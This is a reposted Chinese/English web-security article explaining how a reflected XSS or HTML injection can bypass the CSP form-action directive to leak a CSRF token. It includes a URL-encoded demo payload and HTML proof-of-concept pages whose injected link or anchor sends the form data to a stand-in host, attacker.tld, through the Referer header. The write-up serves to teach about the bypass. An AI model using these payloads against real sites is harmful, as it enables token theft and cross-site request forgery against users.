使用反射XSS配合form-action绕过CSP
CSP(Content-Security-Policy)是一个HTTP响应头包含指示,指示浏览器如何限制页面上的内容。例如,“表单操作指令”限制什么起源形式提交。CSP表单操作指令可以限制哪些url可能提交表单的页面。这种保护可以绕过的XSS / HTML注入漏洞。
The form-action directive To understand why the “form-action” directive is important from a security perspective, imagine this scenario: Since the CSP doesn’t allow scripts, we can’t use scripts to extract the csrf token. However, by injecting a <form> tag we can override where the form (including the csrf token) will be submitted: Bypass in Chrome The directive can be bypassed by overriding the method of an existing form (using the formmethod attribute) to “GET” and the action (using the formaction attribute) to “” (current page). We then combine this with a referrer leaking element such as “<link rel=’subresource’ href=’http://attacker.tld/link-subresource‘>”. When the victim then clicks our injected submit button, the browser will send the form values to the current page as GET parameters. These GET parameters are then leaked to attacker.tld because of the referrer leaking element. In other words, the form values (including CSRF token) will be sent to http://attacker.tld through the Referer header. form-action bypassed! Demo: 22%20formaction=%22%22%20form=%22subscribe%22% 20formmethod=%22get%22%20/%3E%3Cinput%20type=% 22hidden%22%20name=%22xss%22%20form=%22subscribe% 22%20value=%22%3Clink%20rel=%27subresource%27 %20href=%27http://attacker.tld/link-subresource%27%3E%22/%3E Aftermath: Bypassing in Firefox The attack for Firefox is essentially the same, but instead of using “<link rel=’subresource’ href=’http://attacker.tld’>” we use “<a href=’http://attacker.tld’>”, the downside being that the user has to click twice as opposed to once.Content-Security-Policy: default-src ‘none’; <html><body><div>[Reflected XSS vulnerability here]</div><form method=”POST” id=”subscribe” action=”/api/v1/newsletter/subscribe”><input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” /><input type=”submit” value=”Subscribe to newsletter” /></form></body></html>
Content-Security-Policy: default-src ‘none’; <html><body><div><form action=”http://attacker.tld”></div><form method=”POST” id=”subscribe” action=”/api/v1/newsletter/subscribe”><input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” /><input type=”submit” value=”Subscribe to newsletter” /></form></body></html>
Content-Security-Policy: default-src ‘none’; <html><body><div><input value="CLICK ME FOR POC" type="submit" formaction="" form="subscribe" formmethod="get" /><input type="hidden" name="xss" form="subscribe" value="<link rel='subresource' href='http://attacker.tld/link-subresource'>"/></div><form method="POST" id="subscribe" action="/api/v1/newsletter/subscribe"><input type="hidden" name="csrftoken" value="5f4dcc3b5aa765d61d8327deb882cf99" /><input type="submit" value="Subscribe to newsletter" /></form></body></html>
本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)
- ·Web渗透之手动漏洞挖掘
- ·SSRF漏洞(原理&绕过姿势)
- ·PHP反序列化漏洞与Webshell
- ·WAF开发之Cookie安全防护功能解析
- ·网络安全的第二道防线:区块链
- ·网络安全的第一道防线:AI
- ·Memcache UDP反射放大攻击技术分析
- ·任意用户密码重置(二):重置凭证接收端
- ·任意用户密码重置(三):用户混淆
- ·任意用户密码重置(四):重置凭证未校验
- ·任意用户密码重置(一):重置凭证泄漏
- ·Web安全学习:如何自我定位与制定学习计
- ·基于SonarQube的自动化代码缺陷检测:Web
- ·Web安全测试基础一
- ·某CMS注入分析及注入点总结
- ·如何系统学习 Web 前端技术?